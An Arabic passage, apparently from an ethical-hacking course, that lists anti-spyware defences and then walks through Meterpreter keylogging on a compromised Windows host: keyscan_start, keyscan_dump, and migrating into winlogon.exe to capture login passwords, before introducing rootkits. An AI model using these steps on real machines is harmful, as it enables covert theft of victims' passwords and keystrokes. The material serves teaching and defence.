PrivacyKeyboard available at http://www.privacykeyboard.com
Elite Anti Keylogger available at http://www.elite-antikeylogger.com
CoDefender available at http://www.encassa.com
Spywareھﻲ ﺑراﻣﺞ ﺧﺑﯾﺛﺔ اﻟﺗﻲ ﺗﻘوم ﺑﺎﻟﺗﺛﺑﯾت ﻋﻠﻰ اﻟﻧظﺎم اﻟﻣﺳﺗﺧدم دون ﻋﻠم اﻟﻣﺳﺗﺧدم وﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻣﺛل اﻟﺑﯾﺎﻧﺎت اﻟﺷﺧﺻﯾﺔ
وﺳﺟﻼت اﻟدﺧول ،اﻟﺦ Spyware .ﺗﺄﺗﻲ ﻣن ﺛﻼﺛﺔ ﻣﺻﺎدر أﺳﺎﺳﯾﺔ ھﻲ :واﺣدة ﻣن اﻟﻣﺻﺎدر اﻟرﺋﯾﺳﯾﺔ ﻣن ﺧﻼل ﺗﺣﻣﯾل اﻟﺑرﻣﺟﯾﺎت اﻟﺣرة،
واﻟﻣﺻدر اﻟﺛﺎﻧﻲ ﻟﺑراﻣﺞ اﻟﺗﺟﺳس ﻣن ﺧﻼل ﻣرﻓﻘﺎت اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ،واﻟﻣﺻدر اﻟﺛﺎﻟث ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس ھﻲ اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﺛﺑﯾت ﺑراﻣﺞ
اﻟﺗﺟﺳس ﺗﻠﻘﺎﺋﯾﺎ ﻋﻧد زﯾﺎرﺗﮭﺎ .ھﻧﺎ طرق ﻟﻠدﻓﺎع ﺿد ﺑراﻣﺞ اﻟﺗﺟﺳس ﻛﺎﻻﺗﻰ:
-ﻻ ﺗﻘوم أﺑدا ﺑﺿﺑط ﻣﺳﺗوى أﻣن اﻹﻧﺗرﻧت اﻟﺧﺎﺻﺔ ﺑك اﻟﻰ ﻣﻧﺧﻔﺿﺔ ﺟدا ) (too lowﻷﻧﮫ ﯾوﻓر اﻟﻌدﯾد ﻣن اﻟﻔرص ﻟﺑراﻣﺞ اﻟﺗﺟﺳس
ﻟﯾﺗم ﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك .ﻟذﻟك ،ﯾﺗم ﺗﻌﯾﯾن إﻋداد اﻷﻣﺎن داﺋﻣﺎ ﻟﻣﺳﺗﻌرض اﻹﻧﺗرﻧت اﻟﺧﺎص ﺑك إﻣﺎ ﻋﺎﻟﯾﺔ أو
ﻣﺗوﺳطﺔ ﻟﺣﻣﺎﯾﺔ اﻟﻛﻣﺑﯾوﺗر ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس.
-ﺟدار اﻟﺣﻣﺎﯾﺔ ﯾﻌزز ﻣﺳﺗوى اﻷﻣن ﻟﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك.
-ﻻ ﺗﻔﺗﺢ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺷﺑوھﺔ وﻣرﻓﻘﺎت اﻟﻣﻠﻔﺎت اﻟواردة ﻣن ﻣرﺳﻠﯾن ﻏﯾر ﻣﻌروﻓﯾن .ﺣﯾث أن ھﻧﺎك اﺣﺗﻣﺎل ﻛﺑﯾر أن
ﺗﺣﺻل ﻋﻠﻰ ﻓﯾروس ،freeware ،أو ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر .ﻻ ﺗﻔﺗﺢ ﻣواﻗﻊ ﻏﯾر ﻣﻌروﻓﺔ اﻟﺗﻲ ﯾﺗم ﺗﻘدﯾﻣﮭﺎ ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد
اﻟﻣزﻋﺞ ،أو ﺑواﺳطﺔ ﻣﺣرﻛﺎت اﻟﺑﺣث ،أو ﺗﻌرض ﻓﻲ ﻧواﻓذ اﻟﻣﻧﺑﺛﻘﺔ ﻷﻧﮭﺎ ﻗد ﺗﻛون ﺗﺿﻠﯾل ﻟك ﻟﺗﺣﻣﯾل ﺑراﻣﺞ اﻟﺗﺟﺳس.
ﺗﺛﺑﯾت اﻟﺑراﻣﺞ اﻟﻣﻛﺎﻓﺣﺔ ﻟﺗطﺑﯾﻘﺎت اﻟﺗﺟﺳس) . (Anti-spyware softwareﺣﯾث ﺗﻘوم ﺑﺣﻣﺎﯾﺗك ﺿد ﺑراﻣﺞ اﻟﺗﺟﺳس. -
Antispywareھو ﺧط اﻟدﻓﺎع اﻷول ﺿد ﺑراﻣﺞ اﻟﺗﺟﺳس .ھذه اﻟﺑراﻣﺞ ﺗﻣﻧﻊ ﺑراﻣﺞ اﻟﺗﺟﺳس اﻟﺗﻲ ﯾﺗم ﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص
ﺑك .ﻓﺈﻧﮫ ﯾﻘوم ﺑﻔﺣص دوري ﻟﻠﻧظﺎم اﻟﺧﺎص ﺑك وﯾﺣﻣﻲ ﺟﮭﺎزك ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس.
ﺗﺣﻘﻖ ﺑﺎﻧﺗظﺎم ﺗﻘﺎرﯾر إدارة اﻟﻣﮭﺎم ) (Task Manager reportsوﺗﻘﺎرﯾر إدارة اﻻﻋداد). (MS Configuration Manager reports -
ﺗﺟﻧب اﺳﺗﺧدام أي ﻧظﺎم اﻟﻛﻣﺑﯾوﺗر اﻟذي ﻟﯾس ﺗﺣت ﺳﯾطرﺗك. -
ﺗﺣدﯾث ﻣﻠﻔﺎت ﺗﻌرﯾف اﻟﻔﯾروﺳﺎت وﺗﻔﺣص اﻟﻧظﺎم ﺑﺣﺛﺎ ﻋن ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ أﺳﺎس ﻣﻧﺗظم. -
داﺋﻣﺎ ﯾﺟب اﺳﺗﺧدام اﻟﺣذر ﻣﻊ أي ﺷﻲء ﯾوﺟد ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت أﺛﻧﺎء ﺗﻧزﯾل وﺗرﻛﯾب اﻟﺑرﻣﺟﯾﺎت اﻟﺣرة .ﻗﺑل ﺗﺣﻣﯾل أي ﺑرﻧﺎﻣﺞ، -
ﺗﺄﻛد ﻣن أﻧﮫ ھو ﻣن ﻣوﻗﻊ ﻣوﺛوق ﺑﮫ .ﺗﺄﻛد ﻣن ﺗﺻرﯾﺣﺎت اﺗﻔﺎﻗﯾﺔ اﻟﺗرﺧﯾص ،ﺗﺣذﯾر اﻷﻣﺎن ،وﺗﺻرﯾﺣﺎت اﻟﺧﺻوﺻﯾﺔ اﻟﺗﻲ ﺗرﺗﺑط ﻣﻊ
اﻟﺑرﻧﺎﻣﺞ .ﯾﻧﺑﻐﻲ أن ﺗﻘرأ ﺟﯾدا ﻟﻠﺣﺻول ﻋﻠﻰ ﻓﮭم واﺿﺢ ﻗﺑل اﻟﺗﺣﻣﯾل.
ﻻ ﺗﺳﺗﺧدم وﺿﻊ اﻹدارة ﻣﺎ ﻟم ﺗﻛن ﺿرورﯾﺔ ﻷن اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻣﺛل ﺑراﻣﺞ اﻟﺗﺟﺳس ﯾﺗم ﺗﻧﻔﯾذھﺎ ﻋﻧدﻣﺎ ﺗﻛون ﻓﻲ وﺿﻊ اﻟﻣﺳؤول. -
وﻧﺗﯾﺟﺔ ﻟذﻟك ،ﻗد ﯾﺣﺻل اﻟﻣﮭﺎﺟﻣﯾن ﻋﻠﻰ اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك.
ﻻ ﺗﺳﺗﺧدم اﻟطرﻓﯾﺎت اﻟﻌﺎﻣﺔ ) (public terminalﻟﻠوﺻول إﻟﻰ ﺣﺳﺎب ﻣﺻرﻓﻲ ،واﻟﺗﺣﻘﻖ ﻣن ﺑﯾﺎﻧﺎت ﺑطﺎﻗﺔ اﻻﺋﺗﻣﺎن ،واﻷﻧﺷطﺔ -
اﻟﺣﺳﺎﺳﺔ اﻷﺧرى .اﻷﻧظﻣﺔ اﻟﻌﺎﻣﺔ ﻟﯾﺳت آﻣﻧﺔ ﻋﻠﻰ اﻹطﻼق ،وﯾﺗم اﻟوﺻول إﻟﯾﮭﺎ ﻣن ﻗﺑل اﻟﻌدﯾد ﻣن اﻟﻣﺳﺗﺧدﻣﯾن .اﻟﺷرﻛﺔ اﻟﺗﻲ ﺗدﯾر
اﻟطرﻓﯾﺎت اﻟﻌﺎﻣﺔ ﻗد ﻻ ﺗﻔﺣص ﻧظﺎﻣﮭم ﻣن أﺟل ﺑراﻣﺞ اﻟﺗﺟﺳس.
ﻻ ﺗﻘوم ﺑﺗﻧزﯾل ﻣﻠﻔﺎت اﻟﻣوﺳﯾﻘﻰ اﻟﻣﺟﺎﻧﯾﺔ ، screensavers،أو اﻟوﺟوه اﻟﻣﺑﺗﺳﻣﺔ ﻣن اﻹﻧﺗرﻧت ﻷﻧﮫ ﻋﻧدﻣﺎ ﺗﻘوم ﺑﺗﺣﻣﯾل ھذه اﻟﺑراﻣﺞ -
اﻟﻣﺟﺎﻧﯾﺔ ﻓﮭﻧﺎك اﺣﺗﻣﺎل أن ﺗﺄﺗﻲ ﺑﺑراﻣﺞ اﻟﺗﺟﺳس ﻣﺧﻔﯾﮫ ﻣﻌﮫ.
اﻟﺣذر ﻣن اﻟﻧواﻓذ أو ﺻﻔﺣﺎت اﻟوﯾب اﻟﻣﻧﺑﺛﻘﺔ .ﻻ ﺗﻘوم أﺑدا ﺑﺎﻟﻧﻘر ﻓوق أي ﻣﻛﺎن ﻋﻠﻰ اﻟﻧواﻓذ اﻟﺗﻲ ﺗﻌرض ﻟك رﺳﺎﺋل ﻣﺛل اﻟﺗﻲ ﺗﻘول -
ان ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻗد ﯾﻛون ﻣﺻﺎﺑﺎ ) ،(your computer may be infectedأو أﻧﮭﺎ ﯾﻣﻛن أن ﺗﺳﺎﻋد ﺟﮭﺎز
اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻟﻠﻌﻣل أﺳرع) . (they can help your computer to run fasterﻋﻧد اﻟﻧﻘر ﻋﻠﻰ ھذه اﻟﻧواﻓذ ﺑك ﻗد
ﺗﺻﺎب ﺑﺑراﻣﺞ اﻟﺗﺟﺳس.
ﺣذف ﻣﻠﻔﺎت ﺗﻌرﯾف اﻻرﺗﺑﺎط ) (cookiesﺑﺷﻛل داﺋم ،caches ،ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ ،اﻟﺗﺎرﯾﺦ واﻟﻣﻠﻔﺎت اﻟﻣؤﻗﺗﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر -
ﻋﻧدﻣﺎ ﯾﺗم ﺗﺻﻔﺢ اﻹﻧﺗرﻧت.
ﻻ ﺗﻘم ﺑﺗﺧزﯾن ﻣﻌﻠوﻣﺎت ﺷﺧﺻﯾﺔ أو ﻣﺎﻟﯾﺔ ﻋﻠﻰ أي ﻧظﺎم ﻛﻣﺑﯾوﺗر ﻟﯾس ﺗﺣت ﺳﯾطرﺗك ﺗﻣﺎﻣﺎ ،ﻣﺛل اﻟﺗﻲ ﻓﻲ أﺣد ﻣﻘﺎھﻲ اﻹﻧﺗرﻧت. -
أﺣﯾﺎﻧﺎ ﯾﻛون ﻣﺧﺗﺑر اﻻﺧﺗراق ﻗد ﺗﻣﻛن ﻣن اﻟوﺻول ﻋن ﺑﻌد إﻟﻰ ﺟﮭﺎز اﻟﻣﺳﺗﺧدم ،ﻟﻛﻧﮫ ﻗد ﻻ ﯾﻛون ﻋرف ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻣﺳﺗﺧدم .رﺑﻣﺎ ﻛﺎن
اﻟﻣﺳﺗﺧدم ﻟدﯾﮫ ﻛﻠﻣﺔ ﻣرور طوﯾﻠﺔ وﻣﻌﻘدة ﻟﻠﻐﺎﯾﺔ واﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ أن ﺗﺄﺧذ ﻓﻘط وﻗﺗﺎ طوﯾﻼ ﻟﻛﺳرھﺎ .ﻣﺎذا ﯾﻣﻛن أن ﯾﻔﻌل؟
Meterpreterﻓﻲ إطﺎر Metasploitﻟﮫ ﻓﺎﺋدة ﻛﺑﯾرة ﻻﻟﺗﻘﺎط ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف واﻟﺗﻲ ﺗﺣدﺛﻧﺎ ﻋﻧﮭﺎ ﺳﺎﺑﻘﺎ واﻟﺗﻲ
ﯾطﻠﻖ ﻋﻠﯾﮭﺎ .Keyloggersﺳﻧﺑدأ ﻣﻊ اﻟﻧظﺎم اﻟذي ﻗﻣﻧﺎ ﺑﺎﺧﺗراﻗﮫ ﺑﺎﻟﻔﻌل وﻗﻣﻧﺎ ﺑﺈﻧﺷﺎء ﺟﻠﺳﺔ ﻋﻣل ﻧﺎﺟﺣﺔ ﺑﻌﯾده ﻣﻌﮫ ﻣن ﺧﻼل .Metasploit
ﺛم ﻧﻘوم ﺑﺗﺷﻐﯾل Meterpreterﻛﻣﺎ ذﻛرﻧﺎ ﺳﺎﺑﻘﺎ ﻓﻲ ﻧﻔس ھذه اﻟوﺣدة.
ﻋﻧد اﻟﻘﯾﺎم ﺑطﺑﺎﻋﺔ اﻟﺗﻌﺑﯾر helpﻓﻲ طرﻓﯾﺔ Meterpreterﺳوف ﯾﻘوم ﺑﺳرد ﺟﻣﯾﻊ اﻷواﻣر اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣﻊ .Meterpreter
ﻟﻛن ﻣﺎ ﯾﮭﻣﻧﺎ ھﻧﺎ ھو اﺳﺗﺧدام Meterpreterﻷداء وظﯾﻔﺔ Keyloggerوذﻟك ﻟﻣراﻗﺑﺔ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ .ﻟذﻟك ﻣﺎ ﯾﮭﻣﻧﺎ ھﻧﺎ ھو اﺳﺗﺧدام
اﻻﻣر .keyscan
ﻟذﻟك دﻋوﻧﺎ ﻧﻣﺿﻲ ﻗدﻣﺎ وﻧرى ﻣﺎ ﯾﺑدو ﻋﻠﯾﮫ ﻋﻧدﻣﺎ ﻧﺑدأ اﺳﺗﺧدام ﻛﻠوﻏر ﻋن ﺑﻌد ،ﺛم ﻧﻘوم ﺑﻌرض ﺿرﺑﺎت ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﺗم اﻟﺗﻘﺎطﮭﺎ.
.1ﺑﺑﺳﺎطﮫ ﺑﻧدا ﻋﻣﻠﯾﺔ اﻟﺗﺟﺳس ﻋﻠﻰ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻋن ﺑﻌد ﺑﻛﺗﺎﺑﺔ اﻻﻣر keyscan_startﻣن ﺧﻼل طرﻓﯾﺔ .Meterpreter
.2اﻵن ﻧﺣن ﺑﺣﺎﺟﺔ ﻓﻘط اﻟﻰ اﻻﻧﺗظﺎر ﺣﺗﻰ ﯾﻘوم اﻟﺿﺣﯾﺔ ﺑﺎﻟﻘﯾﺎم ﺑﺑﻌض اﻷﺷﯾﺎء ﻋﻠﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ .ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ﻟدﯾﻧﺎ ،واﻟﻣﺿﻲ
ﻗدﻣﺎ وﻓﺗﺢ اﻟﻣﺗﺻﻔﺢ اﻟﺧﺎص ﺑوﯾﻧدوز ،7وإﺟراء ﺑﺣث ﻓﻲ ﺟوﺟل.
.3اﻵن ﻣرة أﺧرى ﻧرﺟﻊ اﻟﻰ اﻟﻧظﺎم ﻛﺎﻟﻲ ،ﻟﻧرى ﻣﺎ ﺗم ﻛﺗﺎﺑﺗﮫ ﺑﺑﺳﺎطﺔ وﯾﺗم ذﻟك ﺑﻛﺗﺎﺑﺔ اﻻﻣر .keyscan_dump
ھﻧﺎ ﯾﻣﻛﻧك ان ﺗرى ﻣن ھذا اﻟﻌرض أن اﻟﻣﺳﺗﺧدم اﻟﮭدف ﻗﺎم ﺑﻛﺗﺎﺑﺔ " "google.comﻓﻲ ﻣﺗﺻﻔﺢ اﻟوﯾب ﺛم ﻗﺎم ﺑﺎﻟﺑﺣث ﻋن
" ?."Will Dallas go 8 and 8 again this year
ﺣﺳﻧﺎ ،ﻣن اﻟواﺿﺢ ان اﻟﻣﺳﺗﺧدم ﻟدﯾﻧﺎ ھو ﻣن ﻣﺣﺑﻲ ﻛرة اﻟﻘدم داﻻس ﻛﺎو ﺑوﯾز .دﻋوﻧﺎ ﻧﺣﺎول ﺑﻌض اﻷﺷﯾﺎء اﻷﺧرى .ﻣﺎذا ﯾﺣدث إذا ﻗﺎم
اﻟﻣﺳﺗﺧدم ﺑﺎﺳﺗﺧدام ﻣﻔﺎﺗﯾﺢ ﺧﺎﺻﺔ ﻣﺛل ﻣﻔﺗﺎح وﯾﻧدوز؟ ﻣﺎ إذا ﻛﺎن اﻟﻣﺳﺗﺧدم ﯾﺳﺗﺧدم اﻟﻣﻔﺗﺎح "وﯾﻧدوز" +اﻟﻣﻔﺗﺎح ) (Iﻟﻘﻔل ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ،ﺛم
ﯾﺳﺗﺧدم ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮫ ﻟﻠﺣﺻول ﻋﻠﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻣرة أﺧرى؟ أﯾﺿﺎ ﻣﺛﻼ ﻗﺎم اﻟﻣﺳﺗﺧدم ﺑﻘﻔل ﻧظﺎم وﯾﻧدوز اﻟﺧﺎص ﺑﮫ ﻣﻊ ﻣﻔﺗﺎح
"وﯾﻧدوز" وﻣﻔﺗﺎح " ."Lﺛم ﺗﺳﺟﯾل اﻟدﺧول ﻣرة أﺧرى ﻓﻲ ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور .اﻵن ﻧذھب ﻣرة أﺧرى ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﻣﻊ
keyscan_dumpﻟﻧرى ﻣﺎ ﻟدﯾﻧﺎ:
ﻛﻣﺎ ﻧرى ان ﺟﮭﺎز اﻟﺿﺣﯾﺔ ﻗﺎم ﺑﺎﻟﺿرب ﻋﻠﻰ ﻣﻔﺎﺗﺢ وﯾﻧدوز +ﻣﻔﺗﺎح Lﺑﺷﻛل ﺻﺣﯾﺢ واﻟذي ﯾﻘوم ﺑﻐﻠﻖ اﻟﺷﺎﺷﺔ وﻟﻛﻧﮫ ﻗﺎم ﺑﺎﻟﺗﺳﺟﯾل ﻣرة أﺧرى
ﻣﻊ ﻛﻠﻣﺔ ﻣرور ﻹﻟﻐﺎء ﻏﻠﻖ اﻟﺷﺎﺷﺔ ،ﻓﺄﯾن ھﻲ ﻛﻠﻣﺔ اﻟﻣرور؟ ﻟﻣﺎذا ﻟم ﯾﺗم ﺗﺳﺟﯾﻠﮭﺎ!
اﻟﻣﺷﻛﻠﺔ ھﻲ ﻓﻲ اﻟطرﯾﻘﺔ اﻟﺗﻲ ﯾﻌﻣل ﺑﮭﺎ ﻧظﺎم اﻻﻣن ﻟﻠوﯾﻧدوز .ﺣﯾث ﺑﺑﺳﺎطﺔ ،أن ﺑﯾﺋﺔ ﺳطﺢ اﻟﻣﻛﺗب ﺗﺧﺗﻠف ﻋن ﺑﯾﺋﺔ ﺗﺳﺟﯾل اﻟدﺧول ﺣﺗﻰ ﻓﻲ
اﻟﺗﻌرﯾﻔﺎت اﻟﺗﻲ ﺗﺳﺗﺧدﻣﮭﺎ ﻛﻼ اﻟﺑﯾﺋﺗﯾن ،وﺟﻠﺳﺔ اﻟﻌﻣل اﻟﻧﺷطﺔ اﻟﺗﻲ ﻗﻣت ﺑﺈﻧﺷﺎﺋﮭﺎ ﻣﻊ اﻟﻧظﺎم اﻟﺿﺣﯾﺔ ﻣن ﺧﻼل Meterpreterﺗﻛون ﻣﻊ
)ﺳطﺢ اﻟﻣﻛﺗب( اﻣﺎ ﺑﺎﻟﻧﺳﺑﺔ ل ) win logonﻋﻣﻠﯾﺔ دﺧول( ﺣﯾث ﻣن ﺧﻼﻟﮭﺎ ﺗﺳﺗﺧدم ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻣﺧﺗﻠﻔﺔ .ﻟذا إذا ﻛﺎﻧت ﺟﻠﺳﺔ اﻟﻌﻣل ﻣﻊ
ﺳطﺢ اﻟﻣﻛﺗب ﻓﻠن ﺗﺳﺗطﯾﻊ اﻟﺗﻘﺎط اﻟﻣﻔﺎﺗﯾﺢ اﻟﺧﺎﺻﺔ ﺑﻌﻣﻠﯾﺔ ﺗﺳﺟﯾل اﻟدﺧول ،أو اﻟﻌﻛس ﺑﺎﻟﻌﻛس .ﻟذﻟك ﺳوف ﺗﺣﺗﺎج إﻟﻰ ﻧﻘل Keyloggersاﻟﻰ
ﺟﻠﺳﺔ اﻟﻌﻣل اﻟﺗﻲ ﺗرﯾد ﻣراﻗﺑﺗﮭﺎ .ﻓﻲ ھذه اﻟﺣﺎﻟﺔ ،ﺑﺑﺳﺎطﺔ ﺳوف ﻧﻘوم ﺑﻧﻘل طرﻓﯾﺔ Meterpreterاﻟﻰ ﺑﯾﺋﺔ Winlogonﺑدﻻ ﻣن ﺑﯾﺋﺔ ﺳطﺢ
اﻟﻣﻛﺗب ﺑﺎﺳﺗﺧدام اﻻﻣر migrateﺣﺗﻰ ﻧﺟد أﻧﻔﺳﻧﺎ ﻓﻲ اﻟوﺿﻊ اﻟﺻﺣﯾﺢ ﻟﻠﺑﺣث ﻋن ﻛﻠﻣﺎت اﻟﺳر .ﺛم ﻧﺑدأ keyscanﻣرة أﺧرى.
.4ﻧﻘوم ﺑطﺑﺎﻋﺔ psﻓﻲ ﻗذﯾﻔﺔ/طرﻓﯾﺔ Meterpreterﻟﻠﺣﺻول ﻋﻠﻰ ﻗﺎﺋم ﺑﺎﻟﻌﻣﻠﯾﺎت اﻟﺗﻲ ﺗﻌﻣل اﻻن .ﺛم ﻧﺑﺣث ﻟﻠﺣﺻول ﻋﻠﻰ PID
اﻟﺧﺎص ﺑﺎﻟﻌﻣﻠﯾﺔ .Winlogon
ﺣﯾث ﻛﻣﺎ ﻧرى ﻣن اﻟﺻورة ھذه ان PIDاﻟﺧﺎص ﺑﺎﻟﻌﻣﻠﯾﺔ winlogon.exeھﻲ 432ﻟذﻟك ﺳوف ﻧﺣﺗﺎج اﻟﻰ ﻧﻘل طرﻓﯾﺔ Meterpreter
اﻟﻰ ﺟﻠﺳﺔ ) (sessionاﻟﻰ ھذا ال .PID
.5ﻧﻘوم ﺑطﺎﺑﻌﺔ اﻻﻣر migrateﺛم PIDﺣﯾث ﻓﻲ ﺣﺎﻟﺗﻧﺎ ھذه ﺳوف ﯾﻛون .migrate 432
ﻣﻠﺣوظﮫ إذا ﺣﺻﻠت ﻋﻠﻰ رﺳﺎﻟﺔ اﻟﺧطﺄ insufficient privilegesﻓﺳوف ﺗﺣﺗﺎج اﻟﻰ رﻓﻊ ﺻﻼﺣﯾﺎﺗك اﻟﻰ ﺻﻼﺣﯾﺎت اﻟﻧظﺎم system
.privileges
.6اﻻن ﻧﻘوم ﺑﻛﺗﺎﺑﺔ اﻻﻣر keyscan_startﺛم ﺑﻌد ذﻟك .keyscan_dump
ﻣﺛل اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ ،ھﻧﺎك أﯾﺿﺎ اﻟﻌدﯾد ﻣن اﻟﺗطﺑﯾﻘﺎت اﻟوﻗﺎﺋﯾﺔ ) (protective applicationاﻟﻘﺎدرة ﻋﻠﻰ ﻣﻧﻊ أو ﻛﺷف وﺣذف اﻟﺗطﺑﯾﻘﺎت
اﻟﺧﺑﯾﺛﺔ .ﻣن أﺟل ﺗﺟﻧب أن ﯾﺗم اﻛﺗﺷﺎف اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ ﻣن ﻗﺑل اﻟﺗطﺑﯾﻘﺎت اﻟوﻗﺎﺋﯾﺔ) ، (protective applicationﺣﯾث ﯾﻘوم اﻟﻣﮭﺎﺟﻣﯾن
ﺑﺈﺧﻔﺎء اﻟﻣﻠﻔﺎت اﻟﺧﺑﯾﺛﺔ داﺧل ﻣﻠﻔﺎت ﻣﺷروع أﺧرى.
Rootkits
ﺗﻣﺎﻣﺎ ﻣﺛل ، Metasploitﻋﻧد ﯾﺗم اﻟﺗﻌﺎﻣل ﻷول ﻣره ﻟﻘوة وﻣﻛر ،Rootkitsوﻋﺎدة ﻣﺎ ﯾﻛوﻧوا ﻣﻧدھﺷﯾن .ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﺑﺗدﺋﯾنRootkits ،
ﯾظﮭر ﻟﮭم ﻋﻠﻰ اﻧﮫ ﯾﻣﻠك ،ﺳﺣر أﺳود ﺗﻘرﯾﺑﺎ .أﻧﮭﺎ ﻋﺎدة ﻣﺎ ﺗﻛون ﺑﺳﯾطﺔ ﻓﻲ ﻋﻣﻠﯾﺔ ﺗﺛﺑﯾﺗﮭﺎ وﯾﻣﻛن أن ﺗﻧﺗﺞ ﻧﺗﺎﺋﺞ ﻣذھﻠﺔ .ﺗﺷﻐﯾل Rootkits
ﯾﻣﻧﺣك اﻟﻘدرة ﻋﻠﻰ إﺧﻔﺎء اﻟﻣﻠﻔﺎت واﻟﻌﻣﻠﯾﺎت واﻟﺑراﻣﺞ ﻛﻣﺎ ﻟو ﻟم ﯾﻛوﻧوا أﺑدا ﻣﺛﺑﺗﯾن ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر Rootkits .ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء
اﻟﻣﻠﻔﺎت ﻋن اﻟﻣﺳﺗﺧدﻣﯾن ،وﺣﺗﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻧﻔﺳﮫ.
Rootkitsھﻲ ﻓﻌﺎﻟﺔ ﺟدا ﻓﻲ إﺧﻔﺎء اﻟﻣﻠﻔﺎت ،ﻓﺈﻧﮭﺎ ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﻛون ﻧﺎﺟﺣﺔ ﻓﻲ اﻟﺗﮭرب ﺣﺗﻰ ﻣن ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت اﻷﻛﺛر دﻗﮫ .ﻋﺎدة ﻣﺎ
ﯾﻘﺎل إن اﺳم Rootkitsﯾﻛون ﻣﺷﺗﻖ ﻣن ﻛﻠﻣﺔ " ،"rootﻛﻣﺎ ھو اﻟﺣﺎل ﻓﻲ اﻟﻣﺳﺗﺧدم اﻟﺟذري أو اﻟﻣﺳﺗﺧدم اﻹداري)، (root/admin access
و " "kitواﻟﺗﻲ ﺗﻌﻧﻰ ﻣﺟﻣوﻋﺔ ﻣن اﻷدوات اﻟﺗﻲ ﺗم ﺗوﻓﯾرھﺎ ﻣن ﺧﻼل ﺣزﻣﺔ اﻟﺑراﻣﺞ.
ﻛﻣﺎ ذﻛرﻧﺎ ﺳﺎﺑﻘﺎ Rootkits ،ﺗﻛون ﻣﺗﺧﻔﯾﮫ ﺗﻣﺎﻣﺎ ) .(stealthyﯾﻣﻛن أن ﺗﺳﺗﺧدم ﻟﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻷﻏراض ﺑﻣﺎ ﻓﻲ ذﻟك ﺗﺻﻌﯾد
اﻻﻣﺗﯾﺎزات ،وﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ،وﺗرﻛﯾب backdoorsواﻟﻣﮭﺎم اﻟﺷرﯾرة اﻷﺧرى .اﻟﻌدﯾد ﻣن Rootkitsﻗﺎدرة ﻋﻠﻰ ﺗﺟﻧب اﻟﻛﺷف
ﻷﻧﮭﺎ ﺗﻌﻣل ﻋﻠﻰ ﻣﺳﺗوى أدﻧﻰ ﺑﻛﺛﯾر ﻣن ﻧظﺎم اﻟﺗﺷﻐﯾل ﻧﻔﺳﮫ ،أي داﺧل اﻟﻧواة/اﻟﻛﯾرﻧل .اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﺗﻔﺎﻋل ﻣﻊ وظﺎﺋف اﻟﻣﺳﺗﺧدﻣﯾن ﻋﺎدة ﻓﻲ
ﺗﻛون ﻓﻲ ﻣﺳﺗوى أﻋﻠﻰ ﻣن اﻟﻧظﺎم .ﻋﻧدﻣﺎ ﯾﺣﺗﺎج ﻗطﻌﺔ ﻣن اﻟﺑرﻣﺟﯾﺎت ﻣﺛل ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت ﻷداء ﻣﮭﻣﺔ ﻣﻌﯾﻧﺔ ،ﻓﺈﻧﮫ ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﻣرر
